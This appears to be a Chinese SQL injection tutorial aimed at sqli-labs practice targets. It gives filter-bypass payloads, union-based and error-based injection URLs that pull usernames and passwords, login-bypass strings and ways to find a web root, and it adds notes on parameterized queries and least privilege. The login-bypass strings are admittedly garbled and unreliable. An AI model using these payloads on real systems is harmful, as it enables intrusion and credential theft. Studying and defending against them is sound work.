她其实并不喜欢你，只是在寂寞的时候，你刚好撞上去，刚好你对她好，刚好你能入她眼，刚好她来者不拒，这所有都是刚好。。。 ---- 网易云热评

一、MYSQL语句

```sql
-- 创建数据库
create database test;

-- 选择要操作的数据库
use test;

-- 创建表
create table aiyou ( id int, username varchar(20), password varchar(30));

-- 向表中插入数据
insert into aiyou values(1,'admin','456');
insert into aiyou values(2,'boss','123');
insert into aiyou values(3,'ttt','123'),(3,'qqq','321');

-- 显示aiyou表中的所有记录
select * from aiyou;

-- 从aiyou表中查找满足条件id=1的记录
select * from aiyou where id=1;

-- 从aiyou表中查找满足条件id=1的记录，并只显示username和password字段内容
select username,password from aiyou where id=1;

-- 从aiyou表中查找同时满足条件id=1以及username=“admin”的记录
select * from aiyou where id=1 and username='admin';

-- 从aiyou表中查找满足条件id=1或者username=“boss”的记录
select * from aiyou where id=1 or username='boss';

drop database test;                                     -- 删除数据库
drop table test;                                        -- 删除表格
update aiyou set password='111' where username='boss';  -- 更新数据
delete from aiyou where username='boss';                -- 删除数据
select load_file('c:/111.txt');                         -- 读文件（需要 FILE 权限，并受 secure_file_priv 限制）
show databases;                                         -- 显示所有数据库
show tables;                                            -- 显示所选数据库的所有表
show create table aiyou\G                               -- 显示表结构的详细数据
describe 表名;                                          -- 显示表结构（大写可以自动补全）
select database();                                      -- 显示当前数据库
select version();                                       -- 显示数据库版本
select user();                                          -- 显示当前用户
select now();                                           -- 显示当前时间
select system_user();                                   -- 获取系统用户名
select current_user();                                  -- 获取当前用户名
select session_user();                                  -- 连接数据库的用户名
select @@datadir;                                       -- 读取数据库路径
select @@basedir;                                       -- mysql安装路径
select @@version_compile_os;                            -- 操作系统
```

二、数据库连接

```php
<?php
$dbhost = 'localhost'; // mysql服务器主机地址
$dbuser = 'root';      // mysql用户名
$dbpass = 'root';      // mysql用户名密码
$conn = mysqli_connect($dbhost, $dbuser, $dbpass);
if(! $conn ) {
    die('Could not connect: ' . mysqli_error());
}
echo '数据库连接成功';
mysqli_close($conn);
?>
```

注：连接失败时 $conn 不是有效连接，应使用 mysqli_connect_error() 获取错误信息；mysqli_error() 需要传入连接句柄。示例中的 root/root 只适合本地实验环境，Web 应用应使用仅拥有所需权限的专用数据库账号。

三、防注入绕过

目标：http://www.aiyou .com?id=1

1、大小写绕过
http://www.aiyou .com?id=1 And 1=1

2、双写绕过
http://www.aiyou .com?id=1 aandnd 1=1

3、%00绕过
http://www.aiyou .com?id=1 a%00nd 1=1

【防护】以上三种写法针对的都是基于关键字黑名单的过滤：区分大小写、只替换一次或遇到 %00 截断的过滤器都无法可靠拦截。应使用预处理语句（参数化查询），并对 id 这类参数做整数类型校验，而不是依赖关键字过滤。

四、手工注入

1、判断注入
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=1 返回正常
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 返回错误，说明存在注入

2、判断列数
http://192.168.21.140/sqli/Less-2/index.php?id=1 order by 3 返回正常，order by 4 返回错误，说明存在三列

3、联合查询
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,2,3 将2或3换成我们想要查询的内容
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,version(),database() 获取当前数据库及数据库版本

4、获取表名
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' 获取security数据库下的表名

5、获取列名
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' 获取users表下的列名

6、获取字段内容
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(username),group_concat(password) from users

五、报错注入

1、获取数据库用户
http://192.168.21.137/sqli/Less-1/index.php?id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select user()limit 0,1))a from information_schema.tables group by a)b --

2、获取数据库名称
http://192.168.21.137/sqli/Less-1/index.php?id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select database()limit 0,1))a from information_schema.tables group by a)b --
http://192.168.21.137/sqli/Less-1/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--

3、获取当前数据库名称（返回的是一个十六进制，需要还原）
http://192.168.21.137/sqli/Less-1/index.php?id=1 and (select 1 from(select count(*),concat((select(select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

4、获取表名
http://192.168.21.137/sqli/Less-1/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

5、获取字段
http://192.168.21.137/sqli/Less-1/index.php?id=1 and(select 1 from(select count(*),concat((select(select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 2,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

6、获取字段内容
http://192.168.21.137/sqli/Less-1/index.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x7e,password,0x27,0x7e) FROM users LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --

【防护】联合查询注入和报错注入都依赖 id 参数被直接拼接进 SQL，并且查询结果或数据库错误信息会回显到页面。应使用预处理语句绑定参数，不向用户输出数据库错误，并让应用使用最小权限的数据库账号，以缩小可被读取的库表范围。

六、后台绕过

（以下各项按页面现有文本保留，原文中的引号、等号等符号在转载时已丢失。）

1、admin#
2、admin or 11 #
3、oror
4、admin or 11
5、admin #

【防护】这类输入之所以能绕过登录，是因为用户名和密码被直接拼接进 SQL 语句。登录查询应使用预处理语句，并在应用层用密码哈希校验（如 password_verify），而不是在 SQL 中比较明文密码。

七、获取网站的根目录

1、报错显示
2、site:目标网站 warning
3、遗留文件phpinfo
4、漏洞爆路径
5、读取配置文件

【防护】生产环境应关闭 display_errors，删除遗留的 phpinfo 等测试文件，避免错误信息和配置文件泄露网站的绝对路径。

禁止非法，后果自负